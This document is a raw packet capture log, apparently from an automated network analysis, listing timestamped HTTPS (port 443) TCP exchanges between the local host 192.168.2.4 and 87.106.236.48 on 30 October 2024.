                                                                                              Oct 30, 2024 19:47:16.206511021 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.206552982 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.206562996 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.206583023 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.206599951 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.207034111 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.207051039 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.207087040 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.207097054 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.207119942 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.207135916 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.240293980 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.240317106 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.240359068 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.240386963 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.240401030 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.240422964 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.240875006 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.240894079 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.240947008 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.240957975 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.240987062 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.240999937 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.281162977 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.281189919 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.281239986 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.281265974 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.281281948 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.281300068 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.329368114 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.329394102 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.329442024 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.329464912 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.329476118 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.329531908 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.329998016 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.330013990 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.330054045 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.330060959 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.330094099 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.330683947 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.330699921 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.330734968 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.330743074 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.330760956 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.330782890 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.331357956 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.331374884 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.331410885 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.331418991 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.331445932 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.331464052 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.365519047 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.365552902 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.365596056 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.365612030 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.365629911 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.365652084 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.366543055 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.366561890 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.366599083 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.366605997 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.366631985 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.366660118 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.404875040 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.404898882 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.404937983 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.404947996 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.404964924 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.404990911 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.453514099 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.453536034 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.453599930 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.453615904 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.453668118 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.454457045 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.454476118 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.454520941 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.454526901 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.454555035 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.454575062 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.455389977 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.455408096 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.455441952 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.455449104 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.455478907 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.455491066 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.456002951 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.456021070 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.456063032 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.456069946 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.456099033 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.456110001 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.489619970 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.489638090 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.489681959 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.489712954 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.489734888 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.489758015 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.490329981 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.490346909 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.490395069 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.490401030 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.490425110 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.490443945 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.576375961 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.576400995 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.576510906 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.576544046 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.576591969 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.577721119 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.577738047 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.577804089 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.577816010 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.577851057 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.578794956 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.578815937 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.578862906 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.578872919 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.578906059 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.579310894 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.579330921 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.579384089 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.579392910 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.579426050 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.580099106 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.580112934 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.580164909 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.580173016 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.580209017 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.612871885 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.612886906 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.613110065 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.613142014 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.613188028 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.613431931 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.613445044 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.613492012 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.613501072 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.613538027 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.651721954 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.651741028 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.651921034 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.651957989 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.652009010 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.699887037 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.699908018 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.699982882 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.699996948 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.700027943 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.700048923 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.701060057 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.701080084 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.701150894 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.701159000 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.701205015 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.701860905 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.701875925 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.701939106 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.701946974 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.701986074 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.702521086 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.702534914 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.702593088 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.702600956 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.702640057 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.735933065 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.735949993 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.736125946 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.736151934 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.736300945 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.736644983 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.736659050 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.736721992 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.736740112 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.736780882 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.774840117 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.774862051 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.775027990 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.775064945 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.775252104 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.823688984 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.823708057 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.823903084 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.823921919 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.823970079 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.824867964 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.824884892 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.824942112 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.824950933 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.824989080 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.825333118 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.825351954 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.825402975 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.825411081 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.825452089 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.826294899 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.826309919 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.826364040 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.826371908 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.826409101 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.826927900 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.826941013 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.826997995 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.827006102 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.827049971 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.859946966 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.859961987 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.860129118 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.860152960 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.860202074 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.860444069 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.860457897 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.860511065 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.860517025 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.860557079 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.898562908 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.898576975 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.898895979 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.898911953 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.898966074 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.956152916 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.956171036 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.956218958 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.956231117 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.956259012 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.956279039 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.956748009 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.956763983 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.956819057 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.956830025 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.956866980 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.957349062 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.957362890 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.957420111 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.957427979 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.957479000 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.958146095 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.958162069 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.958197117 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.958204031 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.958226919 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.958255053 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.958785057 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.958800077 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.958834887 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.958841085 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.958868027 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.958884001 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.983501911 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.983516932 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.983576059 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.983582973 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.983624935 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.984227896 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.984241009 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.984292984 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.984299898 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.984325886 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.984343052 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.984654903 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.984668016 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.984710932 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:16.984718084 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:16.984757900 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.079368114 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.079382896 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.079466105 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.079479933 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.079523087 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.079957962 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.079977036 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.080017090 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.080024004 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.080049038 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.080065012 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.080765963 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.080780029 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.080832958 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.080841064 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.080876112 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.081234932 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.081248999 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.081307888 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.081315041 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.081362963 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.082118988 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.082135916 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.082185030 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.082192898 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.082231045 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.082578897 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.082593918 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.082647085 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.082654953 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.082689047 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.107064009 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.107079983 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.107152939 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.107167959 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.107208967 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.107903957 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.107920885 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.107975006 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.107983112 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.108022928 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.145694017 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.145719051 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.145817995 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.145833015 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.145879030 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.206487894 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.206513882 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.206582069 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.206599951 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.206741095 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.206741095 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.207021952 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.207043886 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.207083941 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.207092047 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.207118034 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.207128048 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.207818031 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.207834959 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.207890034 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.207897902 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:17.207935095 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:17.208532095 CET4434973187.106.236.48192.168.2.4
